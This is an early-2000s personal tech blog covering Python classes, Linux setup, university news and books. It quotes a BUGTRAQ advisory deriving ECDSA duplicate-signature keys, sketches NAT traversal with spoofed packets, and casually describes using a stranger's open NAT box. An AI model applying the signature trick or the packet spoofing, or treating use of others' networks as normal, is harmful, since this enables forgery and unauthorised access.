    The blogdex front page currently contains many entries like PremiumDomains - www.pornovideo.bz - DOMAINS FOR SALE and so on. Looking at the track page it seems that 8 sites in the ubiquitous.nu domain have been registered with blogdex and are successfully bombing it. Raph is going to have a field day

    A younger Ashcroft on go...

    Zooko wrote me a email about the merits and demerits of Altas Shrugged and I decided to try and read it. I can't help but wonder if the loan length is ment to tell me something. A different book I got out today has to be back by 5/12, but Atlas Shrugged is due back 29/4/03

    New Python Objects

    There's a copy of Atlas Shrugged in the library, but I'm afraid of starting a book that huge given the amount of time it might suck up. Anyone read it and wish to commend/curse it?

    There was a pretty interesting discussion on comp.lang.python recently. Take the following code:

    class C:
        def __getattr__ (self, x):
        	self.val = 1
    	return getattr (self.val, x) 

    Now calling x = C(); x + 5; returns 6 as expected. Now make C a new style Python class (by deriving it from object) and you get:

    Traceback (most recent call last):
      File "", line 1, in ?
    TypeError: unsupported operand types for +: 'C' and 'int' 

    Alex Martelli explained things thus:

    Yes it can. The idea is that operators should rely on special methods defined by the TYPE (class) of the object they're working on, NOT on special methods defined just by the OBJECT itself and not by its class. Doing otherwise (as old-style classes did, and still do for compatibility) is untenable in the general case, for example whenever you consider a class and its metaclass (given that the metaclass IS the class object's type, no more and no less).

    So, for example, a + b now looks for a potential __add__ special method, NOT in a itself, but rather in type(a) [except, for compatibility, when a instances an old-style class]. I had some difficulty understanding that, early on in the lifecycle of Python 2.2, but when the notion "clicked" I saw it made a lot of sense.

    So, to wrap an arbitrary object X in such a way that X's special methods will be used by any operator, you need to ensure you do the wrapping with a _class_ that exposes said special methods. That's generally easiest to do with a factory function with a nested class that uses inheritance, but you have many other choices depending on what exactly you're trying to accomplish.

    Hmm, just a links posting...

    Hmm, just a links posting today.

    Leaky Abstractions

    The UCL and Imperial merger is off, thank god!

    Everyone seems to be commenting on leaky abstractions, in which Joel berates non-perfect abstractions. Well, enough people have taken him to task for that but no one seems to point out that perfect abstractions can be a total nightmare in certain situations.

    Now, I'm sure we all know the advantages of abstractions, but in some cases you aren't writing portable applications and the abstractions only serve to frustrate you.

    Take TCP. There is no way to find out which data has been acked by the other side, the seq/ack numbers etc from any sockets implementation that I've ever seen. When you're writing freaky NAT stuff that information can be needed. See the exokernels papers for designs which take the idea of pierceable abstractions to the (safe) limit.

    The Perfect Prawn Cocktail Sandwich

    I consider myself quite the expert on prawn cocktail sandwiches. I've had them from all round the country, from several other countries, and even fresh in a fishing village. But living just down the road from Harrods I thought I might as well give them a shot. Quite frankly, I don't think I'll ever be able to stomached a non-Harrods prawn cocktail sandwich ever again!

    UK DMCA Reply

    Got a three page reply from my MP today containing a couple of letters from the Dept of Trade and Industry about the EUCD:

    Basically, the DTI replies are avoiding the question and generally seem to indicate a lack of understanding:

    The EU Copyright Directive does not require us to make any changes that will affect the ownership of intellectual property.

    Laws of Form

    (Laws of Form, G. Spencer Brown, ISBN: 0 04 510028 4)

    I got Laws of Form from the library after it was mentioned in this K5 article on alternative logic systems. (it is also mentioned in The Ghost Not).

    It's a neat little book, if a little dry. I highly recommend reading the notes at the same time as reading the chapters in order to make sense of anything. I must admit that, at the end of it, I'm a little disappointed. The ideas contained are neat, but I cannot help feeling that a different author could have made a better job of the book. In fact, I'm very glad I had read the two links above before the book as they explain things a lot more clearly. Also, some of the more interesting parts (such as the link to predicate logic is given but a short section in the notes).

    G\"odel's Proof
    (G\"odel's Proof, Ernest Nagel and James R. Newman, ISBN: not given)

    (I'm sure there's a &something; to get the accent right above the o. But I don't know what it is so just imagine that your brain preparses TeX...)

    Chaitin described G\"odel's 1931 paper as "very difficult to understand" and recommended this book instead. I wholeheartedly agree. I got this book from the library at 11am today and had finished it by 5pm, even with 4 hours of lectures and lunch and a geometry sheet in there too. A very gentle introduction to G\odel's proof which deals with about as much detail as you would wish and no more. If you've translated the original paper from the German into Lojban etc, then you aren't going to get much from this I'll admit, for everyone else this is a must.

    Aaron

    Aaron now has (IMHO) the prettyist blog. There is also a wonderful entry on trusted computing (best viewed in Mozilla).

    More NAT

    I now have a working way of getting data back thru NATs: ICMP. Echo Requests open a tunnel back through the NAT so, with a server assisting, NATed hosts can setup bidirectional links. Unfortunately, the NAT mangles the ID number which the other host needs in order to send replies.

    It so happens that the NAT at Imperial doesn't actually check the source address of the reply is correct, only the ID, so it would be easy to find the ID. But I cannot believe this is generally true so the only way to get the ID would be to use the fact that the NAT assigns IDs incrementally and try to hit the correct ID. Eww!

    About 3 hours work this afternoon....

    ... I've so far learnt that NETLINK and QUEUE targets clash if they're both loaded into the kernel and NETLINK then appears to work, except that no actual packets turn up! AGGGH!

    That Poster

    I found a picture of that poster that I mentioned before on this page. Just remember, this hasn't been touched up or anything and there really are posters exactly like this all over London:

    Poster Image

    Communication Over Double NAT

    The DTCP design would work (I think) if only there wasn't also a firewall at Imperial which stops incoming UDP packets (even if a NAT would let then in). The only other solution would be to tunnel everything in DNS packets (which do seem to work) or to find another place to develop from.

    (P.S. they need to be real DNS packets - just using the port numbers isn't enough).

    So, here's the next idea - Assisted TCP. The idea being to have a userland program linked to libnet and libpcap at each end (A and B) and a 3rd party (C) unfirewalled. The ends can talk both ways to C via TCP and can fabricate packets to the NAT and the local kernel. C can fabricate packets with the source address of A and B to the other side of the NATs.

    Skipping the details, A & B both send SYN packets to each other (both die at the oppsite NAT) then C fabricates SYN+ACK packets from A and B to make the NATs think it's a normal outgoing connection.

    That leaves out how to make the local kernel think it's a normal connection too, but I think it can be done without patching it directly.

    Ingress and Egress filters might stop C from sending the SYN+ACK packets and it's more messy than doing it via UDP, but it should work. (I've already checked that A can't send a SYN+ACK thru the NAT).

    I would hope, in the end, to probe each technique to pick the best that works, in the mean time it's a question of comming up with a decent toolkit.

    Introduction

    Just posted on BUGTRAQ (not by me):

    Contemporary world is practically impossible without systems of electronic digital signature (EDS). Every Internet user imperceptibly for himself uses them. It is these methods which ensure functionality and efficiency of contemporary banking sector. Despite this fact the EDS standards themselves are very young and are at the stage of perfection. One of the most perspective standards is ANSI X.9-62 ECDSA of 1999 - DSA for elliptic curves. In the process of adaptation all peculiarities of the operations with the elliptic curves were not taken into account to full extent and it gave an opportunity to imitate substitution of the signed document. One of the main requirements to the methods of digital signature is the impossibility to find within reasonable period of time two or more documents corresponding one signature (or vice versa). In addition to the EDS mechanism the procedure of hashing is used (in DSA it is SHA-1) which results in assigning to each document very large and unpredictable number (hereinafter referred to as hash) which is signed.

    The majority of the attacks is aimed at this procedure in order to find method of receiving documents with identical hashes (or hashes which differ at given value). This work uses slightly different approach: there is made an attempt by modification of the keys chosen by the user to find such meanings of the signature so that they match two previously determined hash values. It was determined that it can be done by ordinary user of EDS scheme, if he specially chooses value for his keys: private key and per- message secret. In this case the user does not need to modify domain parameters of EDS. For the purpose of clearness below is given an illustration of the substitution of signature for approved NIST sets of parameter of federal use.

    I suppose that there is no need to comment legal consequences of the existence of common signature for two documents.

    Description of the mistake

    Mathematical apparatus of the latest American standard of electronic digital signature know as ECDSA (DSA for elliptic curves) [1 page 25-30] contains grave mistake which makes it possible to choose value of secrete code in order to get identical signatures for various documents. The described mistake differs from the already known, having similar consequences DSKS (Duplicate Signature Key Selection) [1, page 30-32] as it does not require participation of the criminal in selection of signature parameters (G,n etc). Thus it is available for almost any EDS user and not only to EDS software engineers.

    The description retains symbols adopted in the standard.

    The mistake is caused by the equality of x-coordinates of the opposite points of the elliptic curve _x(G)= =_x(-G). (1)

    It is easy to see that from nG=0 follows that (n-1)G=-G (2)

    Thus rl = _x(kG)= = r2=-x( (n-l)kG)= = r (3)

    where k - per-message secret of the signature for the purpose of simplicity taken for 1.

    The development of formula for k>1 is analogous.

    Let we need to select identical signature for messages M1 and M2 ( or rather for their hashes e1 and e2). We can calculate such private key d that signatures for these messages will be identical. Let k1 = 1, k2 = n-1, then r1 = r2=r_x(G) (3a)

    Lets take a closer look at the formula of the signature:

    • S: = k'(e+dr)(mod n)
    • s1=k1'(e1+dr) mod n (4a,b)
    • s2=k2'(e2+dr) mod n (4 a,b)

    where

    • k1'*k1 mod n = 1; k1' = 1
    • k2'*(n-k1) mod n = 1; k2'= n-1
    • e1 = SHA(M1); e2=SHA(M2)

    This implies that s2=s1=s if (e1+dr) = = (n-1)*(e2+dr) (mod n) (5) 2dr = (n-1)(e2+e1) (mod n) (5b)

    From here it is easy to find d: d = z'(n-1)(e2+e1) mod n (6)

    where z'*(2r) mod n = = 1 mod n

    Thus we get absolutely identical signatures (s, r) for various messages.

    It is not difficult to correct this mistake. It is only necessary to provide for demonstrative generation of d.

    For example, random variable Seed0 is chosen. Private key d : = SHA-1(Seed0) Both values are retained. It is impossible to select desirable value d in this scheme. Of course, the time of key generation will increase, but it is not critical in the majority of cases.

    There is one more option: to send as signature not (s,r) but rather (s, R) where R=kG.

    Sincerely yours,

    A.V. Komlin, Russia

    Detailed description of ECDSA standard and known attacks at it is given in the book The Elliptic Curve Digital Signature Algorithm (ECDSA) Don Johnson (Gerticom Research), Alfred Menezes (University of Waterloo) February 24, 2000. The book is available in PDF format at http://rook.unic.ru/pdf/ecdsa.zip.

    The mentioned below page contains Java-applet allowing to calculate within several seconds in the interactive mode identical signatures and required keys for any two different messages in five standard NIST curves or in any its own

    http://www.venue.ru/sign1en.htm

    The applet code us not closed and one can look it through with JAD.

    ARP Tables

    • A couple of Pd links here and here
    • Eight Legged Freaks isn't worth going to see.

    In recent kernels an option called arptables popped up. Like iptables and ipv6tables it does pretty much what the name suggests. However, I can't find any userland tools for it and this message suggests there aren't any.

    After reading the code it seems resonably easy to do. Unless someone beats me to it, I might give it a shot

    DTCP

    ... but before I do, I'm going to give libdtcp a crack. DTCP is the protocol used in Coderman's Alpine and is designed for double NATed hosts with loose UDP-NAT rules. Watch this space.

    Java-SSH

    Since Mozilla is still being clipboard brain-dead I'm typing URLs into vim by hand. This means that I mess up some of them (since I'm too lazy to check) and, sure enough, I messed up the link to JSCH. Atsuhiko Yamanaka was kind enough to mail me and point it out. (now fixed)

    Secure Beneath the Watchful Eyes

    There's a poster campane in London at the moment, run by London Transport advertising the introduction of more CCTV camera on buses. The slogan is "Secure Beneath the Watchful Eyes" and has a big picture of disembodied eyes watching over a London bus going over Westminster bridge. (I wish I could find someone with a digital camera so I could take a picture of it)

    Now, I don't have any figures on how effective CCTV on buses is etc and what the cost is so I can't judge if putting CCTV on buses is a good idea or not. But that poster scares me. Rather than suggesting that the CCTV cameras are there to deter people from doing <insert bad action here> the general sense is that we should feel all warm and fuzzy in our nanny state.

    I suppose it's just a poster campane - but still...

    Oxford Union Meeting

    Well, the contact listed in NTK did finally reply. Unfortunately, it was a little late to organise a weekday trip. However, given the type of people there I'm sure it will be well covered. Bruce Dickinson and Chuck D are no longer appearing, by the way.

    All these events

    TBL pointed out that Neal Stephenson is speaking at Trinity this Thursday. I cannot, unfortunately, make it because of lecture and tutorial commitments. Also, there's a debate at Oxford on the same day (see the bottom of the last entry), but the contact given for that hasn't got back to me, so it doesn't look like I can make that either! To wrap things up, Ross Anderson, Alan Cox and a M$ rep are talking about TCPA in London. Zooko suggested I try to get in for free (it would otherwise be nearly 400GBP) by playing the student/hacker/reporter card. I'm sure I can get a camera and tape recorder to do a good report should they let me in.

    Mozilla Again

    After a remerging mozilla it now starts up cleanly and has AA fonts - which is nice. Unfortunately, the AA fonts make it pretty slow and the clipboard doesn't work at all (pasting in, or copying from) to some of the links might have typos in them today. Sigh. (oh, and it misses out some scanlines in text too)

    Protests at IC

    Imperial has announced a couple of things that have annoyed a few people. Firstly, charging students extra "top-up" fee of upto £15,000 a year and merging with University College The first provoked a student protest [1][2](with good turnout despite it being cold and rainy) and the latter a threat from the lectures to strike.

    I think some background is needed here. For a long time, going to university was `free' (not including living and eating etc) because it was paid for by the government. That system was setup when 5% of the school leaving population were expected to attend a university. At the moment that number is more like 50% and a few years ago the (Labour) government started charging £1,100 per year in fees. Nearly all students are deeply in debt by the time they leave uni. Now, it costs the college something like £10,500 per year per student and they get £7,500 per year per student from the government. No wonder that something needs to be done

    Now, if you live in the US you are thinking "£15,000 is nothing, look what I pay!", but the UK has never worked like that - we have a much higher level of taxation for one and the protest is largely about the lack of consultation with the Union. I think this text is interesting, as are some of the comments here.

    On a selfish note, it's unlikely that I would have to pay these fees as I'll be gone before they come in. Actually, I'll be forced to go before they start charging this.

    And onto the second issue, merging with UCL (University College, London). London Uni is (I think) unique in this country that the colleges are more-or-less unis in themselves. At Oxford and Cambridge (who have the best known colleges) a subject is taught by the department and all students of x at the university goto the same department. However, Uni/London colleges have their own departments.

    Now, UCL is in deep fiscal trouble and if ICL and UCL merged they would likely split from the university and setup on their own. This could create a terrible mess as they would have to cut some duplicate departments (thus reducing costs etc, which is the point). Now I think that wherever UCL and ICL both have a department of x, ICL's is going to be better. But for political reasons they can't just choose on academic grounds because then UCL gets badly cut, so some ICL departments might get shutdown. Also, ICL students are a little worried about the culture clash. UCL has 18,000 students and ICL less than 10,000 so, in a democratic Union, UCL holds sway.

    Cambridge

    I went to Cambridge yesterday to meet up with a couple of friends and have a look at some of the colleges in daylight. In short: both Dowling and Trinity are beautiful. Now, Beit Hall at IC is reasonable, but most of IC is pretty ugly. Cambridge is a work of art.

    Unfortunately, I couldn't talk to TBL because I had to get back. I guess I'll have to accept his argument on random walks in n-d space until I can understand it. I would liked to have asked how his provable code project is going though.

    I also saw this book on quantum computing in the Waterstones there. Maybe a little dense, but might be good. Also there was this book which is the first book I've seen to cover iproute2.

    Libraries

    One of the best things about being at Uni is that you get access to a good library. I can easily waste hours in IC Central Library. It has the whole of Computers and Typesetting (Knuth) which has re-awakened my desire to rework TeX (this is pretty nuts, but one of my saner ideas). It also has AMOP, which is otherwise impossible to get in this country (expect getting it one off shipped).

    Oh, and looking at the catalog it has the Quantum Computing book I mentioned above. My reading list has never been so long, or so cheap!

    Hilary Rosen in Oxford

    From NTK:

    NTK's two spiritual forefathers face off at last, when CHUCK "PUBLIC ENEMY" D and BRUCE "IRON MAIDEN" DICKINSON take opposing sides at next week's "This House Believes That Music Is Not For Sharing" debate at the Oxford Union (8.30pm, Thu 2002-10-24, Cornmarket St, Oxford, complex admission procedure which we'll go into later). The event also marks a rare UK public appearance by HILARY ROSEN of arch anti-P2P villains THE RECORDING INDUSTRY ASSOCIATION OF AMERICA, and thus a handy leafleting opportunity for the copy-protection-opposing CAMPAIGN FOR DIGITAL RIGHTS - plus a chance to get our new "Corrupt Disc - Inferior Audio" t-shirt at not-available-in- the-shops knock-down prices. Basically, mail tips@spesh.com (with the subject line "Fight The Power") for meet-up details - the Oxford Union is actually a members-only debating society rather than a proper Union like ULU, but does have a mildly complicated guest-admission procedure. Or failing that, we'll just go to the pub and swap mp3 remixes of "Bring The Noise". http://www.oxford-union.org/mod.php?mod=calendar&op=show_event&event_id=10 - "I'm Running Free", eh Bruce? Not under Palladium you're not http://uk.eurorights.org/issues/cd/button/ - actual "CD" logo font looks more like Eurostile Heavy to us http://www.yaleherald.com/article.php?Article=1153 - taking "talk like a pirate" day too far http://www.xenoclast.org/free-sklyarov-uk/2002-October/003442.html - file under "Yo, bum rush the show"

    I'm hoping to make it there, but it's a bit short notice.

    Mozilla

    Will takes me to task for upsetting poor old Mozilla - it does take a lot of bashing, doesn't it? Firstly, it's a beta kdebase which somewhat excuses the failure to compile.

    Seems Will gets on really well with Mozilla and suggests that the blank screen is a freetype problem. That it may be, but it means it takes me an extra 20 seconds everytime as I startup mozilla - get a blank screen - swear - kill mozilla - rm -Rf ~/.mozilla - startup mozilla. Even even then it's just not very fast. It has got better - it used to be unusable on IV, now it's just slow. I'm afraid that Konqueror and Opera just run faster here, even if their CSS support is a little dodgy.

    (Also, tabbed browsing is only useful for people who have overlapping windows - no such things there)

    Build Options

    Will also point to this page with lots of weird and wonderful gcc options for building Gentoo (or anything else really). Just remember, you're not allowed to use anything that breaks the ABI, even if you build from stage1 because it still links some binary code in.

    Firewalls

    Sometimes, even iptables can't do what you want and you have to start coding. So last night I coded up ipt_machide (and libipt_machide for userspace) for my firewall.

    Basically, an incoming packet (Ethernet only) matches if its source MAC address is in your ARP table. Now, the source MAC address is very spoofable, so you have to have normal rules under that, but it works very well to hide from scans (of which there are many on the IC halls network). As soon as you try to contact another box, a pending entry is put in your ARP table, the ARP reply matches and everything works fine.

    At the moment I have to do a linear search of the ARP table because it's indexed by IP address, not MAC. It might be reverse indexed, but there are no comments at all so it's a little difficult to tell. Also, quite a number of IPs have the MAC address of the NAT box here so I need to check that the source IP address (if there is one) matches the ARP entry too.

    Aaron goes to DCI'm sure ...

    • Aaron goes to DC
    • I'm sure I've read lots of interesting stuff that deserves a link here, but my bookmarks are a little fragmented so I don't have any links.

    Eep. It's been a while since I've updated this (but not as long as Ian). Internet connectivity is pretty much sorted out and I've been using the extra bandwidth to install Gentoo. For those who don't keep up with Linux distrib news, Gentoo is a new, source based distrib.

    The current (beta, but soon to be 1.4) release uses GCC 3.2 to compile and, since it builds (almost) everything from source, you are free to set nice compile options (like -march=pentium2 -O3 -pipe etc). GCC 3.2 has some nice new code like the register colouring algorithm, which means that the generated code is pretty slick. So the idea is that Gentoo runs pretty fast and, on the whole, you can notice it. It's not jaw dropping, but it is there.

    But, of course, it takes time to compile all that stuff. I gave up on OpenOffice after 24 hours (dual PII 450) and kdebase just fails to build. Gentoo does have something called the "Gentoo Reference Platform" for binary installs, but I don't think it's live yet.

    So, lacking kdebase, means that I don't have my, much-loved, konqueror. Not disheartened, I emerge mozilla and mozilla 1.0 builds just fine. Shame about the code. Every time I start it up I need to rm -Rf .mozilla otherwise all I get is a blank window, creating new windows just does nothing, copying and pasting also does naut. I guess the saving grace is that it doesn't crash like my old Debian 0.9 package did. Unfortunately, a usable browser it is not, so with a quick prayer to the Stallman idol in the corner I installed Opera 6.

    Damm. I hope I get konq installed soon to save my GNU soul because Opera just works, and works fast, and renders correctly and ... The only niggle I have is the oversized toolbar which is in the free version. The answer that that is, of course, pay for it.

    Oh, and the department are getting some Macs so I'll have to play with more non-free software.

    The USS Clueless gets /.'...

    Well, my bank refused me a debit card, so as much as I like to pay for the Internet connect in my room - I can't because they don't take cash. Thankfully, they allow free access to the department computers and ssh (at least in 3.4) has a nice feature called dynamic port forwarding. Basically, you use pass -D xyz on the command line and port xyz is a SOCKS4 proxy and all connections get forwarded down the ssh tunnel.

    I'm not sure that it's working perfectly yet (OpenSSH_3.4p1 Debian 1:3.4p1-2) as sometimes I need the connection will just stall - but Gentoo is installing fine using it. It also means that the people on the same hub as me don't get to see what I'm reading.

    However, since everything goes down one connection things aren't quite perfect as a single dropped packet will stall everything, not just the single substream because they're all the same to TCP. However, on a 10Base-TX connection that's not a major issue.

    Also, the sysadmins at Imperial seem really nice and I hope to move IV to department server at some point.

    <AccordionGuy> XML is to programming as modifying the main deflector [array] is to Star Trek.

    Well, I'm offline again a...

    Well, I'm offline again and warwalking doesn't turn up anything useful. I found a nice little NAT box that was helpfully forwarding packets and acting as a web proxy for me. That has now disappeared. I guess they noticed the hole. I would be quite willing to pay for it, but they refuse to take cash and my debit card is still coming through. I hate the fiscal system, but efforts seem to be stalled at the moment.

    The most interesting paper I've read in a while is from the Tarzan people. They basically describe an IP level anonymising layer. Even if you think you know more than should be legally allowed about mixnets/DCRs and pipenets it's worth a read. It includes a couple of nice tricks I haven't seen before.

    The source code hasn't been released, but Michael Freedman has hinted to me that they are talking to the Cebolla folks about a common codebase.

    In the short time that I did have use of that NAT box I managed to apt-get upgrade and install Gentoo. I've now got to go pruning services on my Debian install (Lord alone knows why it decided to install ircd and diald).

    Imperial is keeping me pretty busy, though none of the material is really stunning at the moment. I did end up in a second year maths lecture today because of a timetabling fault, however, and it was pretty good. Maybe I should lecture hop

    Long (ish) story, but I'm...

    Long (ish) story, but I'm back online now at Imperial. Will write more when I have the time.

    Life at Imperial

    As I write this I still don't have any connection so god knows when this will by uploaded. There is a 10Base-TX connection in my room, but it doesn't seem that anything is happening on it. I think I need to go someplace and register for them to make it live.

    Any access points either at the moment, though I haven't gone warwalking yet. I don't imagine that the Imperial APs will be switched on this early in the term anyway.

    The room (shared) is beautifully positioned and big enough to drive a car between the beds, which is a pleasent surprise. I gather from talking to some of the students in other halls that I could have done a lot worse.

    More, I guess, when I have more time and more to say. I should find someone with a digital camera to take some photos of this place, but right now I'm off warwalking.

    "Essences, Orcs and Civilization"

    Davin Brin (author of Transparent Society) has a fantastic keynote transcript on his site from the Libertarian Party National Convention (July 2002).

    This text is really the perfect speech to give to the Libertarians, esp the part about their drugs policy. In fact, I can't pull out a single paragraph that I want to take issue with.

    Now all I need is for someone to write a nice, lucid essay on how money is not the territory.

    Nothing wonderfully excit...

    Nothing wonderfully exciting today I'm afraid.

    Writers for hire by compa...

    Writers for hire by companies and governments. One wonderful quote:"

    Will Self said: "I return to the words of Bill Hicks when he said, 'If any artist ever endorses a product then they have completely destroyed their status as an artist.' I don't care if they shit Mona Lisas on cue, they've destroyed their reputations, and advertising for the Government is much more pernicious."

    The proceedings of the OLS are up (and have been for a while). A treasure trove of interesting papers contained is contained therein. Highlights (so far) include:

    • Lustre: the intergalactic file system
    • Cebolla: Pragmatic IP Anonymity
    • SE Debian: how to make NSA SE Linux work in a distribution
    • Online Resizing with ext2 and ext3
    • Advanced Boot Scripts
    • BitKeeper for Kernel Developers
    • Linux Advanced Routing & Traffic Control

    I've finished ripping my CD collection and all they don't make 'em like they used to. My older CDs would be quite happy reading at 4 speed. The newer ones (from about 92 onwards) struggle to manage 1.4 speed (there are a couple in between). The older ones seem to by physically thicker too. I guess they cut down on the quality at some point to reduce production costs.

    oh, and mirrors of dvdsynth should they become, ah, required.

    Imperial Looms

    Preparations for Imperial continue... Since I don't think I can fit both monitors in my room I've switched to using just one to see if I can manage. It's not too bad, I've had to rejig my desktops and I'm switching much more between them but I think I can cope. The main problem so far is that by bookmarks aren't even close to fitting on one screen. Not using multi-head also means that I can have anti-aliased fonts but I think I need to set them up a little first.

    I'm also ripping all my CDs at the moment (OGG, of course). For that I've had to buy a new power supply since my old 230W browned out under the load of all 4 SCSI drives, 2 processors and a DVD drive going. This new one is going fine, hell, I might even spin up the 20GB IDE and the 36GB SCSI that I'm not using at the moment.

    The move also means that I'm finally buying all the stuff I should have brought before, namely:

    • New watch, a Timex Expedition with a nice leather strap (look a little like this one). I broke the last one on a bouncy castle
    • A new short-wave radio. At the moment I use that radio in my stereo, but since the CD and tape players are broken it seems a little silly to take the whole thing.
    • A 10/100 network card (DLink 530TX, a VIA Rhine based card). A pair of these have been working 24x7 in metis for months now, so I guess they're pretty good.
    • 300W PSU (see above)
    • New headphones
    T0rn

    The author of the T0rn rootkit has been arrested [TheReg, BBC] under the Computer Misuse Act. This is a pretty worrying development because, from the sources, it seems that the only `offence' was writing that rootkit, and isn't even very good. Hell, I could do better than that in a couple of days.

    Now, I don't support writing rootkits. I know nothing of the accused author, but most of the people using it wouldn't be suitable to wipe shit off my shoe. However, writing it shouldn't be a criminal offence, for two reasons:

    Firstly, where you do want to draw the line for `bad software' and who draws it? Is a rootkit bad ("sure, it's only used by little hax0r twits"), so how about exploit code? or fragrouter?, or nmap? or ping -f or DeCSS or even the Linux kernel? If we let the legal system start drawing lines then you just know that we are going to be trapped under a torrent of clueless idiots. That same kind of clueless idiots who are banning all computer games in Greece (I'm afraid that the court decision that said the law was wrong has been overturned) or calling t0rn a "route kit" (I kid you not, on BBC CEEFAX last night).

    Secondly, we have a DMCA like "code is speech" argument where you have to draw another line saying "under this is free speech and above it is an illegal tool". The DeCSS case has already shown the futility of that system. Exactly how detailed a description of a rootkit can I write before it's illegal?

    Unfortunately it seems that the clueless lawyers have decided to draw these lines anyway. Again. It's gonna be a damm busy wall.

    AaronSw

    Our very own, AaronSw was on the World Service last night talking about warchalking (right at the end of Newshour). He has links to an ogg (1.8MB) and MP3 (3.2MB). He may well be on NPR's Weekend Edition on Saturday. Go Aaron!

    Iraq

    This isn't a warblog and, as such, I'm not making any value judgements about the whole Iraq situation. However, I can't stop cracking a smile at the wonderful bait-and-switch that Iraq has pulled. Only 6 days ago, Iraq was saying that inspectors would never be let in (wrapped in a lot of anti-US rhetoric). Now, Bush wants a war (not a value judgement) and saw this as a perfect point of conflict that would bring in the rest of the Security Council. That was the bait and Bush/Blair took it completely saying that Iraq wouldn't be attacked if inspectors went in.

    Then yesterday, Iraq switched and listening to the US trying to rebuild their case on Radio4 was just delicious.

    Coding

    When I know what I'm doing I can actually turn out a fair few lines in a day. None of it was anything stunningly deep, but I did about 500 (with some testing and debugging).

    Also, I'm going to play about with using weak pointers in this project. Having many interlinked structures (as this code has) can be a real pain when it comes to deleting anything because any dangling pointers left over and pop goes the process.

    And this is interesting. To find the highest key in a STL map the second code snippet works and the first prints 0:

    printf ("%d\n", (m.end()--)->first);
    map<int,int>::iterator i;
    
    i = m.end();
    i--;
    printf ("%d\n", i->first);
    Kernel Wish list

    Two things consistently bug me about the kernel, if anyone can send me a solution to either of these I would be most grateful:

    • When a process that was listening on a socket dies it can leave connections in the TIME_WAIT state which stops anything from binding to the same port for about a minute. I'm sure there is a very good reason for this on a LAN/WAN scale, but when developing stuff it's a total pain.
    • There's no good way to get a consistent time from the kernel. Something like milliseconds since the process started would be great, but most of the clocks the kernel provides either measure the wrong thing (e.g. times(2)) or are affected whenever someone changes the system clock (e.g. gettimeofday(2)). The closest I can get is the ITIMER_REAL timer, but it has a maximum setting of about 240 days on Linux and it could be much less under other kernels.
    Tao Te Ching

    Leaving on a more thoughtful note, here's an interesting quote I found reading through the Tao Te Ching (section 38, Stan Rosenthal's translation)

    The man who is truly wise and kind
    leaves nothing to be done,
    but he who only acts
    according to his nation's law
    leaves many things undone.

    coderman pointed out that...

    coderman pointed out that I was being an idiot with that map code, it should have been a prefix operator of course.

    <coderman> i think c++ makes everyone feel stupid at times. esp. with the STL you get very subtle effects that make sense in hindsight, but are extremely confusing at first light.

    Also, coderman suggested that gethrtime would be a good solution to the time problem. Indeed it would, if only it existed in Linux.

    Ian has a blog!!...

    Ian has a blog!!

    OpenSSL

    Power cut for about 10 hours today, grumble.

    Aaron pointed out that IV's TLS/qmail was probably vulnerable to the OpenSSL bug. I could have sworn that Debian released a security advisory for this, but I couldn't find it and, sure enough, metis still had 0.9.6c. There still isn't a DSA for this, but unstable has 0.9.6g (as does metis now). Thanks Aaron.

    Malaise

    JDarcy:

    My little corner of the blogosphere seems to have gotten a lot quieter lately. Obviously I've been updating less often than I used to, but many others - e.g. Zooko, AccordionGuy, even Wes Felter - seem to have gone through noticeably fallow periods of late. Whether the result is more or less visible output, everyone seems to be worried about whether they're getting enough (of whatever they want to do) done.

    The latest person to catch this apparently-communicable disease is coderman. In his latest article, he laments the slow progress on personal projects, but finds hope in this observation:

    I try to keep the posting frequency of IV at a reasonable level, but I do find that I'm not really reading or doing anything wonderfully worthwhile at the moment. In fact all this year I haven't really been coding anything significant. Mostly because I don't have any projects.

    People say stuff gets done when programmers have an itch, and it's pretty much true. When I know what I'm doing I code like mad, but I find gumption traps all too common, mainly when something isn't quite right. (I have an unfortunate perfectionist streak). Lately all the itches have been far too big (I've bitched about this before) and I don't feel up to fighting them.

    I sometimes think that I should work on Whiterose again since Oskar says that protocol is quite stable now. But then I look at the protocol doc and give up again.

    Maybe things will change at Imperial.

    (oh, Coderman is being told to spend more time with his wife via her blog )

    HashCash

    HashCash isn't a new idea, but it's being talked about again, which is a shame really because I haven't come across a single application where hashcash would work well. Adam Back lists a few at the end of the aforelinked paper, including flood limiting in Freenet. Ignoring the practical problems of integrating hashcash, the major problem is that it scales linearly. If I want to do 1 action, I pay x. If I want to do 5 actions I only pay 5x. There is no way to tell different requesting parties apart, so this is fundamental.

    Remember that computers from 5 years ago are going to be about 10 times slower than today's, and you hardly want to cut them off. So you either set the cost far too high, or spammers aren't going to notice it because buying a cheap cluster to calculate hashes isn't really going to bother them. (or even just write a virus/worm to make all the poor Windows users do it for you).

    And even in systems where he suggests that hashcash only kick in in a DoS situation (e.g. connection flooding) it doesn't provide "more graceful service" degradation as he claims. It simply moves the bottleneck from the CPU/network to the client, and the fastest client gets served first. (Which would be ok if all the attackers were much slower, but they aren't).

    An interesting development would be a computer generatable (my spell checker doesn't like that, but I think it's ok) challenge that only humans could solve. Possibly rendering some text and then messing it up would require a human to solve. That might still be impractical, and spammers could simply hire a sweatshop to solve them all day, but it would be interesting.

    That lawyer

    Oh, and on the spamming front; that lawyer who got blacklisted wrote back:

    When it comes to mail administration, it appears I was several years behind the curve. Since my mail server software, circa 1996, had been purring along quietly without problems since it was new, I had never upgraded it to a version capable of a higher degree of authentication. I'm also old enough to remember when an "open relay" was a relay intentionally left open for anyone to use, not one merely susceptible to misuse. Thanks to all of the readers who wrote to bring me into the new millennium. Both my software and my definition are now upgraded.

    At the same time, I labelled the blackhole list operators "vigilantes" for good reason. It was always my understanding that if you lie about your identity to gain access to something that would be closed to you if you told the truth, you've done something wrong. That's true whether you intend to send spam or prevent it. As vile as spam is, the ends don't justify the means. Regardless of whether my mail server used to be "open" or not, I stand by the legal analysis that placed fault on the blackhole operators who forged their identity.

    The wonders of editing

    I'm still not sure if this is a spoof or not. If it is, it's a very good one. Quick summary: US lawyer (IP lawyer, naturally) finds his mail server is listed as an open relay, denies that it is one (while giving enough of the story to show that it is) and immediately talks of legal action against the anti-spam group without a thought to fixing the mail server. A good laugh, spoof or (tragically) not.

    Via JWZ:

    Senator Clinton was booed when she walked on stage last October at a rock concert in Madison Square Garden to benefit 9/11 victims. It was shown live by VH1 but, as ABC's John Stossel illustrated in a July 20/20 special on media distortions, when the Viacom-owned cable channel replayed it sound technicians replaced the booing with cheering and applause. And that version is the permanent record VH1 put onto its DVD of the event.

    source

    RedHat 7.3 Install

    (all of the following section is tounge-in-cheek )

